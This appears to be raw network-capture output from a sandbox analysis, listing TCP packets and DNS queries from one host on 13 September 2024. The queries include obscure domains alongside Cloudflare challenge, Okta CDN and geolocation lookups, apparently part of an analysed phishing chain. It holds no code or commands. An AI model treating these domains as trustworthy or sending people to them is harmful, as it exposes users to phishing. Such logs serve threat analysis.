                                                        Sep 13, 2024 15:07:13.417821884 CEST49840443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.417834997 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.440162897 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.464705944 CEST49840443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.478586912 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.478604078 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.478878975 CEST49839443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.478892088 CEST44349839104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.482383966 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.482470036 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.483150959 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.483335972 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.484217882 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.484227896 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.513813972 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.513910055 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.513987064 CEST49840443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.513998032 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.514060974 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.514102936 CEST49840443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.514111042 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.514147997 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.514193058 CEST49840443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.522131920 CEST49840443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.522144079 CEST44349840104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.527187109 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.724026918 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.724217892 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.724286079 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.724899054 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.724899054 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.724925995 CEST44349845104.21.43.126192.168.2.5
                                                        Sep 13, 2024 15:07:13.724977016 CEST49845443192.168.2.5104.21.43.126
                                                        Sep 13, 2024 15:07:13.889935017 CEST44349844172.67.148.27192.168.2.5
                                                        Sep 13, 2024 15:07:13.890290022 CEST44349844172.67.148.27192.168.2.5
                                                        Sep 13, 2024 15:07:13.890381098 CEST49844443192.168.2.5172.67.148.27
                                                        Sep 13, 2024 15:07:13.892379045 CEST49844443192.168.2.5172.67.148.27
                                                        Sep 13, 2024 15:07:13.892395973 CEST44349844172.67.148.27192.168.2.5
                                                        Sep 13, 2024 15:07:13.896774054 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.896831989 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:13.896944046 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.897228956 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:13.897258043 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.381922007 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.396661043 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:14.396676064 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.397804976 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.400239944 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:14.400437117 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.400893927 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:14.443416119 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.996769905 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.996967077 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:14.997083902 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:15.000004053 CEST49847443192.168.2.5104.21.55.124
                                                        Sep 13, 2024 15:07:15.000030994 CEST44349847104.21.55.124192.168.2.5
                                                        Sep 13, 2024 15:07:25.459891081 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:25.459917068 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:25.460036039 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:25.460664034 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:25.460680008 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:26.103202105 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:26.104013920 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:26.104027987 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:26.104372025 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:26.105916977 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:26.106038094 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:26.152633905 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:29.896213055 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:29.896225929 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:29.896296024 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:29.896579981 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:29.896589994 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.355910063 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.359705925 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.359723091 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.363230944 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.363296986 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.366785049 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.366961956 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.366985083 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.407447100 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.412729979 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.412739992 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.465142012 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.489336967 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.489523888 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.489604950 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.489739895 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.489759922 CEST4434985035.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.489769936 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.489808083 CEST49850443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.490475893 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.490524054 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.490605116 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.490824938 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.490843058 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.973714113 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.974045992 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.974072933 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.975176096 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.975593090 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.975764990 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.975764990 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:30.975764990 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:30.975888014 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:31.027640104 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:31.105146885 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:31.105360985 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:31.105428934 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:31.105575085 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:31.105590105 CEST4434985135.190.80.1192.168.2.5
                                                        Sep 13, 2024 15:07:31.105624914 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:31.105664968 CEST49851443192.168.2.535.190.80.1
                                                        Sep 13, 2024 15:07:36.030647039 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:36.030714989 CEST44349849142.250.186.164192.168.2.5
                                                        Sep 13, 2024 15:07:36.030785084 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:36.407704115 CEST49849443192.168.2.5142.250.186.164
                                                        Sep 13, 2024 15:07:36.407718897 CEST44349849142.250.186.164192.168.2.5
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 13, 2024 15:06:23.288228035 CEST53600741.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:23.288316011 CEST53520451.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:23.288345098 CEST53644491.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:23.288453102 CEST53567091.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:24.047785044 CEST5946653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:24.048211098 CEST6326753192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:24.054640055 CEST53594661.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:24.054816008 CEST53632671.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:24.280884027 CEST53541021.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:26.328727961 CEST6426353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:26.329540014 CEST5632253192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:26.360177994 CEST53563221.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:26.504132986 CEST53642631.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:27.276535988 CEST5811453192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:27.283762932 CEST5431853192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:27.300019026 CEST53543181.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:27.315351009 CEST53581141.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:29.760493040 CEST6450253192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:29.760817051 CEST5342253192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:29.772283077 CEST53534221.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:29.813879013 CEST53645021.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:29.880037069 CEST5450353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:29.880615950 CEST6536753192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:29.888995886 CEST53653671.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:29.891437054 CEST53545031.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.638262987 CEST6058353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.638545036 CEST5764353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.639240980 CEST5395553192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.639935017 CEST5740353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.640423059 CEST5702253192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.640836954 CEST5393053192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.642177105 CEST5967853192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.642323017 CEST5259653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:31.645800114 CEST53605831.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.646476984 CEST53539551.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.646508932 CEST53576431.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.647064924 CEST53574031.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.647464991 CEST53570221.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.647774935 CEST53539301.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.653512955 CEST53525961.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:31.657126904 CEST53596781.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:32.476289988 CEST4920253192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:32.476464033 CEST5559653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:32.478621006 CEST5505453192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:32.478837013 CEST5439153192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:32.484081030 CEST53492021.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:32.484448910 CEST53555961.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:32.485999107 CEST53543911.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:32.486182928 CEST53550541.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:33.003407955 CEST5988453192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:33.003407955 CEST4920553192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:33.012026072 CEST53598841.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:33.014615059 CEST53492051.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:33.016972065 CEST5520453192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:33.018477917 CEST5392553192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:06:33.025237083 CEST53552041.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:33.025836945 CEST53539251.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:06:41.577105999 CEST53599321.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:00.529408932 CEST53609031.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:00.557470083 CEST5090653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:00.558341980 CEST6384353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:00.569746971 CEST53509061.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:00.596065044 CEST53638431.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.519661903 CEST5588153192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.520126104 CEST5283153192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.520636082 CEST5244853192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.520790100 CEST5409053192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.521703959 CEST5650853192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.521920919 CEST6376153192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.529043913 CEST53558811.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.529326916 CEST53528311.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.529934883 CEST5808253192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.530024052 CEST53524481.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.530039072 CEST53540901.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.530077934 CEST5890853192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:04.532140017 CEST53565081.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.532788992 CEST53637611.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.540014029 CEST53589081.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:04.542010069 CEST53580821.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:05.446243048 CEST6427853192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:05.446243048 CEST5562353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:05.453494072 CEST53642781.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:05.453749895 CEST53556231.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:05.465353012 CEST5292653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:05.465615034 CEST5366653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:05.473896027 CEST53536661.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:05.473999023 CEST53529261.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:05.789375067 CEST5774153192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:05.789375067 CEST6371653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:05.797076941 CEST53577411.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:05.799138069 CEST53637161.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:06.142791986 CEST5665153192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:06.143053055 CEST5334453192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:06.150087118 CEST53566511.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:06.150583029 CEST53533441.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:06.506187916 CEST53519251.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:07.523305893 CEST5979753192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:07.523305893 CEST5170553192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:07.532867908 CEST53597971.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:07.538655996 CEST53517051.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:08.462758064 CEST53559511.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:08.554749012 CEST53646191.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:09.580663919 CEST4948353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:09.580852985 CEST5211053192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:09.587565899 CEST53494831.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:09.588012934 CEST53521101.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:10.237271070 CEST6336053192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:10.237627983 CEST5341653192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:10.239444017 CEST5865453192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:10.239834070 CEST6007253192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:10.245414019 CEST53633601.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:10.247256041 CEST53534161.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:10.365791082 CEST53600721.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:10.372896910 CEST53586541.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:12.282037973 CEST5642453192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:12.282325983 CEST4944353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:12.415252924 CEST53494431.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:12.478595972 CEST53564241.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:21.835839033 CEST53562341.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:23.880783081 CEST53570041.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:29.888506889 CEST5326353192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:29.888676882 CEST6190153192.168.2.51.1.1.1
                                                        Sep 13, 2024 15:07:29.895314932 CEST53532631.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:29.895545959 CEST53619011.1.1.1192.168.2.5
                                                        Sep 13, 2024 15:07:49.943268061 CEST53595281.1.1.1192.168.2.5
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Sep 13, 2024 15:07:00.596131086 CEST192.168.2.51.1.1.1c27c(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 13, 2024 15:06:24.047785044 CEST192.168.2.51.1.1.10xb202Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:24.048211098 CEST192.168.2.51.1.1.10x987fStandard query (0)www.google.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:26.328727961 CEST192.168.2.51.1.1.10x7be6Standard query (0)mithunaads.inA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:26.329540014 CEST192.168.2.51.1.1.10x6452Standard query (0)mithunaads.in65IN (0x0001)false
                                                        Sep 13, 2024 15:06:27.276535988 CEST192.168.2.51.1.1.10x77b3Standard query (0)saj.mordantif.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:27.283762932 CEST192.168.2.51.1.1.10xed1fStandard query (0)saj.mordantif.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.760493040 CEST192.168.2.51.1.1.10xe4abStandard query (0)hyu.prosolmi.suA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.760817051 CEST192.168.2.51.1.1.10xfafaStandard query (0)hyu.prosolmi.su65IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.880037069 CEST192.168.2.51.1.1.10x6bdeStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.880615950 CEST192.168.2.51.1.1.10x2b5fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.638262987 CEST192.168.2.51.1.1.10x951cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.638545036 CEST192.168.2.51.1.1.10xa1c4Standard query (0)code.jquery.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.639240980 CEST192.168.2.51.1.1.10xec44Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.639935017 CEST192.168.2.51.1.1.10x7877Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.640423059 CEST192.168.2.51.1.1.10x15eeStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.640836954 CEST192.168.2.51.1.1.10xa5bStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.642177105 CEST192.168.2.51.1.1.10xb89fStandard query (0)hyu.prosolmi.suA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.642323017 CEST192.168.2.51.1.1.10x70b7Standard query (0)hyu.prosolmi.su65IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.476289988 CEST192.168.2.51.1.1.10xbcccStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.476464033 CEST192.168.2.51.1.1.10xad37Standard query (0)code.jquery.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.478621006 CEST192.168.2.51.1.1.10x355dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.478837013 CEST192.168.2.51.1.1.10x64eaStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.003407955 CEST192.168.2.51.1.1.10xbb78Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.003407955 CEST192.168.2.51.1.1.10x1e58Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.016972065 CEST192.168.2.51.1.1.10x191bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.018477917 CEST192.168.2.51.1.1.10x3939Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:00.557470083 CEST192.168.2.51.1.1.10xc0d6Standard query (0)saj.mordantif.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:00.558341980 CEST192.168.2.51.1.1.10xb81eStandard query (0)saj.mordantif.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.519661903 CEST192.168.2.51.1.1.10x7acdStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.520126104 CEST192.168.2.51.1.1.10x28bStandard query (0)cdn.socket.io65IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.520636082 CEST192.168.2.51.1.1.10xb246Standard query (0)github.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.520790100 CEST192.168.2.51.1.1.10x724bStandard query (0)github.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.521703959 CEST192.168.2.51.1.1.10x6beaStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.521920919 CEST192.168.2.51.1.1.10x3a79Standard query (0)www.google.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.529934883 CEST192.168.2.51.1.1.10xb0eStandard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.530077934 CEST192.168.2.51.1.1.10xea5eStandard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.446243048 CEST192.168.2.51.1.1.10x81aaStandard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.446243048 CEST192.168.2.51.1.1.10xfc2dStandard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.465353012 CEST192.168.2.51.1.1.10x6e1dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.465615034 CEST192.168.2.51.1.1.10xf056Standard query (0)www.google.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.789375067 CEST192.168.2.51.1.1.10x9202Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.789375067 CEST192.168.2.51.1.1.10xfe56Standard query (0)cdn.socket.io65IN (0x0001)false
                                                        Sep 13, 2024 15:07:06.142791986 CEST192.168.2.51.1.1.10xb811Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:06.143053055 CEST192.168.2.51.1.1.10x7953Standard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.523305893 CEST192.168.2.51.1.1.10xbcbdStandard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.523305893 CEST192.168.2.51.1.1.10xf8ebStandard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:09.580663919 CEST192.168.2.51.1.1.10x866cStandard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:09.580852985 CEST192.168.2.51.1.1.10x3e99Standard query (0)get.geojs.io65IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.237271070 CEST192.168.2.51.1.1.10xd88eStandard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.237627983 CEST192.168.2.51.1.1.10x1bbfStandard query (0)get.geojs.io65IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.239444017 CEST192.168.2.51.1.1.10x96a0Standard query (0)fipyf.orpkf.ruA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.239834070 CEST192.168.2.51.1.1.10xe191Standard query (0)fipyf.orpkf.ru65IN (0x0001)false
                                                        Sep 13, 2024 15:07:12.282037973 CEST192.168.2.51.1.1.10x7a4bStandard query (0)fipyf.orpkf.ruA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:12.282325983 CEST192.168.2.51.1.1.10x4731Standard query (0)fipyf.orpkf.ru65IN (0x0001)false
